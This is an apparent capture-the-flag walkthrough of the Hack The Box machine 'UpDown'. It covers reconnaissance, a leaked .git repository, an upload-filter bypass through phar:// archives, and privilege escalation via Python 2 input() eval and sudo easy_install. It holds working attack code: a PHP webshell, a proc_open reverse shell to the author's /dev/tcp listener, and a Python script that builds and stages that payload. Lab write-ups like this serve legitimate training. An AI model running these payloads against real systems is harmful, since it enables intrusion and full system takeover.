#hackthebox #medium #linux #tjnull
![[Pasted image 20250806165015.png]]
# Information Gathering - Nmap
I scanned all TCP ports and discovered 2 open ports: 22 and 80
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:39 UTC
Nmap scan report for 10.10.11.177
Host is up (0.061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 17.47 seconds
```
I ran a second TCP scan with default scripts and version detection against ports 22 and 80 only.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:43 UTC
Nmap scan report for 10.10.11.177
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
```
Lastly, I scanned the top 10 UDP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:44 UTC
Nmap scan report for 10.10.11.177
Host is up (0.048s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp open|filtered microsoft-ds
631/udp closed ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
```
---
# Enumeration
##### HTTP - TCP 80
It's a page that tells you if a website is up and running or down.
![[Pasted image 20250806124741.png]]
Mapped `siteisup.htb` to the IP address in `/etc/hosts` (hostname only, no `http://` scheme, or the entry is ignored).
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.177 siteisup.htb
```
![[Pasted image 20250806125724.png]]
To confirm that the checker really fetches the submitted URL from the server side, I started a Python web server on my machine and gave the checker a URL pointing at it. The target requested it twice:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.177 - - [06/Aug/2025 17:56:28] "GET / HTTP/1.1" 200 -
10.10.11.177 - - [06/Aug/2025 17:57:30] "GET / HTTP/1.1" 200 -
```
![[Pasted image 20250806125737.png]]
I turned `Debug mode` on and checked again. It shows the HTTP headers of the request the target made and lists every file available in that directory.
![[Pasted image 20250806130326.png]]
Burp shows the same thing.
![[Pasted image 20250806130035.png]]
`ffuf` discovers one valid subdomain, `dev.siteisup.htb`, which I also added to `/etc/hosts`.
![[Pasted image 20250806132151.png]]
However, `dev.siteisup.htb` returns `403 Forbidden`.
![[Pasted image 20250806143514.png]]
I found `.git` manually at `http://siteisup.htb/dev/.git/`, since my go-to wordlists don't include `.git`.
![[Pasted image 20250806133907.png]]
`git-dumper` downloads all the source code to `git_loot` directory.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://siteisup.htb/dev/.git git_loot
[-] Testing http://siteisup.htb/dev/.git/HEAD [200]
[-] Testing http://siteisup.htb/dev/.git/ [200]
[-] Fetching .git recursively
...
<SNIP>
```
Output of `git log` in the dumped repository:
```bash
commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD)
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 19:38:51 2021 +0200

    Delete index.php

commit c8fcc4032487eaf637d41486eb150b7182ecd1f1
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 19:38:08 2021 +0200

    Update checker.php

commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:33:11 2021 +0200

    Create checker.php

commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:30:58 2021 +0200

    Update changelog.txt

commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:30:39 2021 +0200

    Create admin.php

commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:29:45 2021 +0200

    Add admin panel.

commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 17:40:49 2021 +0200

    Create changelog.txt

commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:28:26 2021 +0200

    Create stylesheet.css

commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:05:40 2021 +0200

    Create index.php

commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:05:08 2021 +0200

    Create .htpasswd

commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:04:38 2021 +0200

    Create .htaccess
```
The dumped `.htaccess` explains the 403. `SetEnvIfNoCase` sets the `Required-Header` environment variable when the request carries a `Special-Dev` header whose value matches `only4dev` (case-insensitive), and the `Deny from All` / `Allow from env=Required-Header` pair rejects every request that does not have that variable set. So the request needs a `Special-Dev: only4dev` header.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header
```
With `Special-Dev: only4dev` added to the request, the server returned `200 OK`.
![[Pasted image 20250806143716.png]]
In Burp's settings I added `Special-Dev: only4dev` so that every request sent through Burp carries the header automatically.
![[Pasted image 20250806144606.png]]
After applying the new settings, `dev.siteisup.htb` no longer returned `Forbidden` but a page with a file upload feature. The top left says `This is only for developers` and that it is currently in `beta`.
![[Pasted image 20250806144812.png]]
I tried uploading `php-reverse-shell.php`, but it returned `Extension not allowed!`
![[Pasted image 20250806145251.png]]
I went back to the source dumped with `git-dumper`: `checker.php` is the file that enforces the upload conditions, and it rejects any file whose extension contains the string `php`.
![[Pasted image 20250806145718.png]]
Renamed with a different extension, the upload didn't error with `Extension not allowed` this time.
![[Pasted image 20250806150124.png]]
However, when I navigated into the newly created folder in `/uploads`, nothing was there.
![[Pasted image 20250806151623.png]]![[Pasted image 20250806151631.png]]
I suspect that's because of this code, which deletes all the uploaded files after checking.
![[Pasted image 20250806151721.png]]
I renamed my payload back to `shell.php` and zipped it into an archive named `shell.jpeg`, so the extension check sees `jpeg` while the archive still carries `shell.php` inside:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ mv shell.phar shell.php
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (deflated 59%)
```
As you can see, the `.jpeg` file is not deleted.
![[Pasted image 20250806151947.png]]
Requesting it directly, however, does not execute the webshell.
![[Pasted image 20250806152034.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php system($_GET["cmd"]); ?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (stored 0%)
```
I tried including the `shell.php` inside the archive through the `page` parameter with a PHP stream wrapper, but it still failed. To see how the server is configured, I swapped the payload for `phpinfo()`.
![[Pasted image 20250806152900.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php phpinfo() ?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (stored 0%)
```
`http://dev.siteisup.htb/?page=phar://uploads/889285754fc9d306daaa0e2e2f218169/shell.jpeg/shell` finally returned the `phpinfo()` page. The `phar://` wrapper reads `shell.php` out of the zip archive regardless of its `.jpeg` name; note that the path ends in `/shell` rather than `/shell.php`, which indicates that the include appends `.php` itself.
![[Pasted image 20250806153413.png]]
It reveals that many functions are disabled, including `system` and `exec`, which is why the earlier `system()` webshell produced nothing.
![[Pasted image 20250806153641.png]]
I used `dfunc-bypasser.py` to find which alternatives were left for command execution. It kept failing until I remembered to add the `Special-Dev` header.
![[Pasted image 20250806154956.png]]
`dfunc-bypasser` confirms that `proc_open` is still available.
![[Pasted image 20250806155235.png]]
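What `dfunc-bypasser` does for you can be reproduced with a few lines. The following is an added example, not code from the writeup or from `dfunc-bypasser`: it pulls the `disable_functions` value out of `phpinfo()` HTML and reports which well-known execution primitives are not on the list. The `disable_functions` string and the `phpinfo()` fragment are constructed for the example; the page only shows that `system` and `exec` were disabled and `proc_open` was not, which the sample reproduces.

```python
import re

# Functions that spawn a process or load native code. A short, well-known
# list kept for the example; extend it as needed.
EXEC_FUNCTIONS = [
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "pcntl_exec", "dl",
]

# Constructed sample of a disable_functions value. It is NOT the target's real
# list; it only reproduces the situation on the page (system/exec disabled,
# proc_open forgotten).
SAMPLE_DISABLE_FUNCTIONS = (
    "pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_exec,"
    "system,exec,shell_exec,passthru,popen,dl"
)

# Constructed fragment in the layout phpinfo() uses for HTML output: the
# directive name in a class="e" cell, then local and master values in
# class="v" cells.
SAMPLE_PHPINFO_HTML = (
    '<tr><td class="e">disable_functions</td>'
    f'<td class="v">{SAMPLE_DISABLE_FUNCTIONS}</td>'
    f'<td class="v">{SAMPLE_DISABLE_FUNCTIONS}</td></tr>'
)


def parse_disable_functions(value):
    """Turn the comma-separated directive value into a set of lower-case names."""
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def extract_disable_functions(phpinfo_html):
    """Return the local value of disable_functions from phpinfo() HTML,
    or None when the directive row is not present."""
    match = re.search(
        r'<td class="e">disable_functions</td>\s*<td class="v">([^<]*)</td>',
        phpinfo_html,
    )
    return match.group(1).strip() if match else None


def still_enabled(disable_functions_value, candidates=EXEC_FUNCTIONS):
    """Return the execution primitives that are not listed as disabled,
    in the order of the candidate list."""
    disabled = parse_disable_functions(disable_functions_value)
    return [name for name in candidates if name not in disabled]


if __name__ == "__main__":
    value = extract_disable_functions(SAMPLE_PHPINFO_HTML)
    print("disabled:", ", ".join(sorted(parse_disable_functions(value))))
    print("still callable:", still_enabled(value))
```

Run against a saved copy of the real `phpinfo()` response (fetched with the `Special-Dev` header, or the request is denied before PHP runs), `still_enabled` gives the candidate list to try; on this box it would contain `proc_open`.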
I created a reverse shell using `proc_open`:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php
$cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($cmd, $descriptorspec, $pipes);
?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (deflated 37%)
```
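The payload-building step, as an added example in Python (not code from the writeup or from the box): it zips the `proc_open` shell above into an archive that can be saved under a harmless extension, models the extension check the page describes, and derives the `phar://` include path. The base URL and upload directory are placeholders copied from the writeup's URL, the `php`-only blocklist is just what the page states, and the rule that the include appends `.php` is inferred from the working URL rather than read from the source.

```python
import io
import zipfile

# The proc_open reverse shell from the writeup, used as the archive's only
# entry. 10.10.14.14:443 is the author's listener; change it for your own.
PROC_OPEN_SHELL = r"""<?php
$cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'";
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open($cmd, $descriptorspec, $pipes);
?>
"""


def extension_blocked(filename, blocked_words=("php",)):
    """Model the upload check as the page describes it: the final extension is
    rejected when it contains a blocked word (case-insensitive). Only the word
    'php' is confirmed by the page; the real list may be longer."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return any(word in ext for word in blocked_words)


def build_archive(entry_name, php_source):
    """Return zip archive bytes holding a single PHP file. The bytes do not
    depend on the name the archive is saved under, so writing them to
    shell.jpeg still gives a valid zip that phar:// can read."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, php_source)
    return buf.getvalue()


def archive_entries(data):
    """List the entry names inside archive bytes (sanity check before upload)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def phar_include_url(base_url, upload_dir, archive_name, entry_name):
    """Build the URL that makes the include read the entry through phar://.
    The entry's '.php' is dropped because the include on the target appends
    '.php' itself (assumption inferred from the working URL on the page)."""
    entry = entry_name[:-4] if entry_name.endswith(".php") else entry_name
    return f"{base_url}/?page=phar://uploads/{upload_dir}/{archive_name}/{entry}"


if __name__ == "__main__":
    archive_name = "shell.jpeg"
    assert extension_blocked("shell.php") and not extension_blocked(archive_name)
    data = build_archive("shell.php", PROC_OPEN_SHELL)
    with open(archive_name, "wb") as fh:
        fh.write(data)
    # The upload directory is only known after the upload; the value below is
    # the one from the writeup, used as a placeholder.
    print(phar_include_url("http://dev.siteisup.htb",
                           "889285754fc9d306daaa0e2e2f218169",
                           archive_name, "shell.php"))
```

Upload the generated `shell.jpeg` through the form (with the `Special-Dev` header), read the upload directory name from the listing, and request the printed URL with your listener running.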
Finally got a shell as `www-data`:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.177] 43444
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ whoami
whoami
www-data
www-data@updown:/var/www/dev$
```
# Privilege Escalation - shell as `developer`
Found `user.txt` in `/home/developer`, but the current user cannot read it.
```bash
www-data@updown:/home/developer$ ls -l
total 8
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 dev
-rw-r----- 1 root developer 33 Aug 6 17:36 user.txt
```
Inside `/home/developer/dev`, the `siteisup` binary has the SUID bit set and appears to run `siteisup_test.py`.
![[Pasted image 20250806163225.png]]
`siteisup_test.py` is Python 2 (the `print` statements have no parentheses). In Python 2, `input()` is equivalent to `eval(raw_input())`: whatever the user types is evaluated as a Python expression, so typing a call instead of a URL runs it.
```bash
www-data@updown:/home/developer/dev$ cat siteisup_test.py
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"
www-data@updown:/home/developer/dev$
```
Feeding it `__import__('os').system('bash')` gave me a shell as `developer`:
```bash
www-data@updown:/home/developer/dev$ ls
siteisup siteisup_test.py
www-data@updown:/home/developer/dev$ ./siteisup
Welcome to 'siteisup.htb' application
Enter URL here:__import__('os').system('bash')
developer@updown:/home/developer/dev$ whoami
developer
```
# Privilege Escalation - shell as `root`
Even with a shell as `developer`, I still could not read `user.txt`: the SUID binary changed my uid, but the group is still `www-data` (gid 33), and `user.txt` is readable only by group `developer`.
```bash
developer@updown:/home/developer$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
developer@updown:/home/developer$ cat user.txt
cat: user.txt: Permission denied
```
I copied the private key from `/home/developer/.ssh` and logged in over SSH with it, which gives a session with the proper `developer` group.
```bash
developer@updown:/home/developer/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
```
Got `user.txt`:
```bash
developer@updown:~$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
developer@updown:~$ cat user.txt
610...
```
User `developer` can run `/usr/local/bin/easy_install` with `sudo` without a password.
```bash
developer@updown:/home/developer/dev$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install
```
GTFOBins has an entry for `easy_install`: pointed at a directory I control, `sudo easy_install` runs that directory's `setup.py` as root.
```bash
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.PgqnvDp3QD
Writing /tmp/tmp.PgqnvDp3QD/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.PgqnvDp3QD/egg-dist-tmp-KvASUn
# whoami
root
```
Found `root.txt`:
```bash
# cd /root
# cat root.txt
e643...
```